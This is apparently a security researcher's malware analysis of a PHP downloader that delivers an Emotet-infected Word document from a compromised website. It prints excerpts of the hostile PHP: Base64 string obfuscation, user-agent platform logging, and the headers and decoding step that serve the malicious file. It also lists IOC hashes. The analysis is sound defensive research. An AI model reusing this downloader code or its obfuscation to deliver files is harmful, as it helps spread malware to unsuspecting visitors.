Emotet infection from PHP: generation of a malicious doc

Introduction

During 2020, the Emotet malware distribution was silent between the beginning of February and the middle of July; this was the longest known break for Emotet. After this pause, the email campaigns started again, with multiple vendors reporting that hundreds of thousands of messages were detected every day¹ ².

There is a long list of security researchers on Twitter that are interested in Emotet, with many accounts sharing samples and findings every day. During this summer I started writing multiple threads reporting abused “.it” domains which were used to distribute this malware. While I was working on one of this daily threads, I found something interesting:

This domain was reported in multiple occasions during the summer, and it was seen for the first time at the end of July:

URLhaus screenshot — Screenshot from URLhaus

I downloaded malware.zip and extracted the content. Although the PHP file in this archive is not detected as malicious in VirusTotal, it is actually used to download a document which contains malicious macros that will attempt to infect the machine.

Background

The Emotet malware was firstly identified in 2014. At that time it was acting as a banking malware, attempting to steal sensitive data; however, during these years, several features were added such as the malspam distribution and the further installation of other malware. Emotet is currently considered one of the most costly threats, affecting not only individuals, but also private organizations, and even governments.

The primary distribution method for Emotet is through malspam: the malware is able to detect the contacts list of the infected machine and to replicate itself by sending emails to these contacts. In addition, since the email will be sent from an hijacked account, these will look less suspicious to the recipients.

The infection methods are multiple: malicious links, document containing macros or scripts. In this case, we will take a look at a PHP file which generates a malicious document file containing macros to infect the machine.

Analysis of the PHP downloader

malware.zip contains a single PHP file (index.php), which reports August 25th as a modification date. Before analyzing the PHP file, it’s worth noting that only the archive malware.zip is found on VirusTotal, with 0 detections for the multiple engines and the first submission from September 26th.

VirusTotal detection — malware.zip on VirusTotal

The PHP file, instead, has 0 matches.

Basic string obfuscation

The first function that should be discussed in this analysis is called d5f44d5a7878a4(). Indeed, index.php contains some obfuscated strings to avoid being detected as malicious, and this function is used to de-obfuscate these strings. Here is the content of the function:

public function d5f44d5a7878a4($s) {
    $string = base64_decode($s);
    return explode('::', $string, 2)[1];
}

We can see that it was used a very basic obfuscation technique. The de-obfuscation function decodes the given string with Base64 and proceed to create an array of strings by splitting the decoded string on the following sequence of characters "::". The return value of d5f44d5a7878a4() is contained in the second element of the array obtained after the split.

For instance, d5f44d5a7878a4() is called later in the file in this way:

$qString = $this->d5f44d5a7878a4("TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=");

Decoding “TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=” with Base64 we obtain “LhCcUWtCLQ==::QUERY_STRING”, thus the variable $qString1 will contain “QUERY_STRING”.

Entry point

The entry point of index.php is represented by the p5f44d5a786a7c() function. Here are the very first lines:

public function p5f44d5a786a7c()
{
    $qString = $this->d5f44d5a7878a4("TGhDY1VXdENMUT09OjpRVUVSWV9TVFJJTkc=");
    if (!empty($_SERVER[$qString])) {
        return $_SERVER[$qString];
    }

As we already saw it before, we know that the function will just return the full query string if its not empty. If we go on, we will find:

$path = '.' . sha1(basename(dirname(__FILE__)));

if (($fp = fopen($path, 'c+')) !== false) {
    if (flock($fp, LOCK_EX)) {
	$stat = array();
        $fileSize = filesize($path);

        if ($fileSize > 0) {
	    $stat = json_decode(fread($fp, $fileSize), true);
        }

The function will now create a hidden JSON file (it has a "." at the beginning) having as a filename the SHA-1 hash of the name of the current directory.

	$platform = $this->getPlatform();
        if (!isset($stat[$platform]) || !is_int($stat[$platform])) {
	    $stat[$platform] = 1;
        } else {
            $stat[$platform]++;
        }

	fseek($fp, 0);
	fwrite($fp, json_encode($stat));
	fflush($fp);
	flock($fp, LOCK_UN);
    }

    fclose($fp);
}

As we can see from the code above, the previously created JSON file is used to count how many instances of different platforms visited the page. The getPlatform() function contains the following:

private function getPlatform() {
    // $userAgent = HTTP_USER_AGENT
    $userAgent = ( isset($_SERVER[$this->
	d5f44d5a7878a4("YWV6ejFFekE5TE5NbVE9PTo6SFRUUF9VU0VSX0FHRU5U")]) ?
	    $_SERVER[$this->
		d5f44d5a7878a4("YWV6ejFFekE5TE5NbVE9PTo6SFRUUF9VU0VSX0FHRU5U")]
		: '' );
    $platform = 0; // PLATFORM_UNKNOWN

    if (stripos($userAgent, $this->
	d5f44d5a7878a4("N3VFR0dla2xiZz09Ojp3aW5kb3dz")) !== false) {
    $platform = 4; // PLATFORM_WINDOWS -> windows
    } else if (stripos($userAgent, $this->
	d5f44d5a7878a4("QlFuRXdiZlRKZz09OjppUGFk")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> BQnEwbfTJg==::iPad
    } else if (stripos($userAgent, $this->
	d5f44d5a7878a4("V1hMdTYyTUw6OmlQb2Q=")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iPod
    } else if (stripos($userAgent, $this->
	d5f44d5a7878a4("N1c3WjVYeld1c0lQZmNnPTo6aVBob25l")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iPhone
    } elseif (stripos($userAgent, $this->
	d5f44d5a7878a4("NllXNWhXMk43RzR4UURFPTo6bWFj")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> mac
    } elseif (stripos($userAgent, $this->
	d5f44d5a7878a4("V0RvWnVPZE5CZnpiZFdVZU93PT06OmFuZHJvaWQ=")) !== false) {
        $platform = 1; // PLATFORM_ANDROID -> android
    } elseif (stripos($userAgent, $this->
	d5f44d5a7878a4("eVhldjU2RFlYUT09OjpsaW51eA==")) !== false) {
        $platform = 3; // PLATFORM_LINUX -> linux
    } elseif (stripos($userAgent, $this->
	d5f44d5a7878a4("TUU0ZmFKekdiRGFPaU42WDo6d2lu")) !== false) {
        $platform = 4; // PLATFORM_WINDOWS -> win
    } elseif (stripos($userAgent, $this->
	d5f44d5a7878a4("cHJoVk9kN291L3FFN0ZxdTo6aU9T")) !== false) {
        $platform = 2; // PLATFORM_APPLE -> iOS
    }

    return $platform;
}

I have inserted some comments to make it easier to read, but the piece of code above is used to check the Navigator.platform attribute which every browser expose to the visited pages. Since we have different options, here is a quick recap of what we will get after the execution of getPlatform():

Unkown 	-> 0
Android -> 1
Apple 	-> 2
Linux	-> 3
Windows	-> 4

Unfortunately I was not able to access the original log file in the first screenshot.

The malicious document

The following steps of index.php include a long list of headers being set. I have added again some comments to make it easier to read the code below, since the function d5f44d5a7878a4() is used to de-obfuscate strings while setting almost all the headers.

// Resist Varnish-cache
setcookie(uniqid(), time(), time() + 60, '/');

// Send cache headers
// gmdate("D, d M Y H:i:s" . "GMT")
$timestamp = gmdate($this->
    d5f44d5a7878a4("N0s4eFRuRTBZMkNlenRiemlpWT06OkQsIGQgTSBZIEg6aTpz"))
    . $this->d5f44d5a7878a4("SUZYQlBrOFJ6d20zNFl4cmNFVlY6OiBHTVQ=");

// header("Cache-Control: no-cache, must-revalidate")
header($this->d5f44d5a7878a4(
    "b0taWDZCUDRleW0veVh4WWtXNGQ6OkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlLCBtdXN0LXJldmFsaWRhdGU="));

// header("Pragma: no-cache")
header($this->d5f44d5a7878a4(
    "U29wSEl0YnRiMEU9OjpQcmFnbWE6IG5vLWNhY2hl"));

// header("Last-Modified:" . $timestamp)
header($this->d5f44d5a7878a4(
    "L1VvdkIxND06Okxhc3QtTW9kaWZpZWQ6IA==") . $timestamp);

// header("Expires:" . $timestamp)
header($this->d5f44d5a7878a4(
    "ZU44eGw1T2N2azlUZ1RUTVhNTU86OkV4cGlyZXM6IA==") . $timestamp);

// Send content headers
$contentName = 'INV_O2GT57A7QBKNN7.doc';
$contentType = 'application/msword';

// header("Content-Type:" . $contentType)
header($this->d5f44d5a7878a4(
    "RVpCZ041ZW5TWCtYeE00WGhSRlQ6OkNvbnRlbnQtVHlwZTog") . $contentType);

// header("Content-Disposition: attachment; filename=" . $contentName")
header($this->d5f44d5a7878a4(
    "NUl6QUhHZ2VPcmpnTzJ0VkpZUTQ6OkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSI=")
    . $contentName . '"');

// header("Content-Transfer-Encoding: binary")
header($this->d5f44d5a7878a4(
    "ekFUS003Szl3Zz09OjpDb250ZW50LVRyYW5zZmVyLUVuY29kaW5nOiBiaW5hcnk="));

It’s also worth noting that the contentName and contentType (respectively the filename and the file type) are also specified.

The only remaining step is to set the actual content of the malicious document file. This content is hardcoded in the $contentData variable; unfortunately the string is too long to be reported here, but here is a screenshot:

few lines of encoded document — Just few lines of the encoded malicious document

The string in $contentData is then used to create the document as follows:

return gzinflate(base64_decode($contentData));

After decoding it with Base64 and inflating the result, the malicious document is ready and the browser used by the victim will prompt the download of a file called INV_O2GT57A7QBKNN7.doc. I have created the following CyberChef³ recipe to replicate this last step from index.php:

From_Base64('A-Za-z0-9+/=',true)
Raw_Inflate(0,0,'Block',false,false)
SHA2('256')

I have included in the recipe an additional step which creates the hash of the file, that can be used to detect if it’s malicious.

You can also see the CyberChef recipe by clicking here.

The document file obtained at the end of the execution of index.php is obviously malicious, being detected by multiple engines in VirusTotal, as you can see from the screenshot below:

VirusTotal detection of the generated doc — Screenshot from VirusTotal

If you want a sample of the file, you can find it in the MalwareBazaar database following this link.

IOCs

Here is a list of the hashes of files which were analyzed in the post:

malware.zip	db1617dc4a09fe856aea8041b90e73467e8d51ad4bdc1fd9a7e0a3197e66339c
index.php	a48791d0e22ba693529285555ebb559bac1786bd703406deb5e1ef9ee8616cc4
INV_O2GT57A7QBKNN7.doc	a302a49cafa48ab0b8d686124f89eb0517a014f31fcb5dc4eb8b574854fbc0c8

If you want to take a look at the original PHP file, you can find it here.

Conclusion

In this post we analyzed a PHP file used to distribute Emotet, a Trojan that has been active since 2014. We saw how index.php uses some basic obfuscation, especially when setting the headers; it also logs which types of OSs are accessing the page in a JSON file.

At the end of the execution, a malicious document called INV_O2GT57A7QBKNN7.doc is ready for the download.

If you are interested in Emotet, follow @Cryptolaemus1 on Twitter and the people in the Cryptolaemus team.

A Comprehensive Look at Emotet’s Summer 2020 Return on ProofPoint ↩︎
Emotet botnet returns after a five-month absence on ZDNet ↩︎
CyberChef ↩︎

Introduction#

Background#

Analysis of the PHP downloader#

Basic string obfuscation#

Entry point#

The malicious document#

IOCs#

Conclusion#